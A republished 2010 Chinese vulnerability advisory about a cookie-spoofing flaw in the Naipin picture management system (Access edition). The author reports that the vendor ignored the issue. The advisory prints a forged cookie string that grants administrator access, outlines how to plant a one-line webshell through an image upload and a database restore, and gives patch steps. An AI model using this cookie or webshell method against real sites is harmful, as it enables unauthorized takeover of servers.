耐品图片管理系统Access版Cookie欺骗漏洞

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了耐品图片管理系统Access版Cookie欺骗漏洞，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1570字，纯文字阅读大概需要3分钟。

内容图文

发布日期：2010-10.08 发布作者：redice 影响版本：20100906 Access版 官方地址：http://www.naipin.com/ 漏洞 类型：Cookie 欺骗 漏洞 描述：大概一年前我发现了《耐品 图片 管理 系统 Access版》有Cookie 欺骗 漏洞 ：任意用户可以通过修改Cookie拿到 管理

发布日期：2010-10.08
发布作者：redice

影响版本：20100906 Access版
官方地址：http://www.naipin.com/

漏洞类型：Cookie欺骗
漏洞描述：大概一年前我发现了《耐品图片管理系统Access版》有Cookie欺骗漏洞：任意用户可以通过修改Cookie拿到管理员权限。

今年6月份我给耐品技术发了邮件，告知了这个漏洞，他们回复如下：

”您好，谢谢您的提醒！
祝您合家幸福安康！“

今天我下载了最新版（Naipin_T_20100906_acc.rar）进行了测试，发现这个漏洞仍然存在。
既然官方如此不重视，我就它放出来。

Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL

利用上面的cookie不登录也能拿到管理员权限...

拿Webshell的一种思路：

如果数据库后缀名是asp的，可以采用该思路。上传用户图像，上传一张含有一句话木马的图片（采用edjpgcom工具）。
进入后台，使用数据库恢复功能将上传的图片恢复为数据库。

修复方案：临时修补办法如下：

（1）Admin_ChkLogin.asp第66行下增加如下代码：
session("GroupId")=Rs("GroupId")

（2）将clsMain.asp的第112行改为如下代码：
UserGroupId=session("GroupID")

（3）建议尽量做到：能写入的目录不给执行权限，能执行的目录不给写入权限。

标签分类： cookie欺骗 验证漏洞

内容总结

以上是互联网集市为您收集整理的耐品图片管理系统Access版Cookie欺骗漏洞全部内容，希望文章能够帮你解决耐品图片管理系统Access版Cookie欺骗漏洞所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

---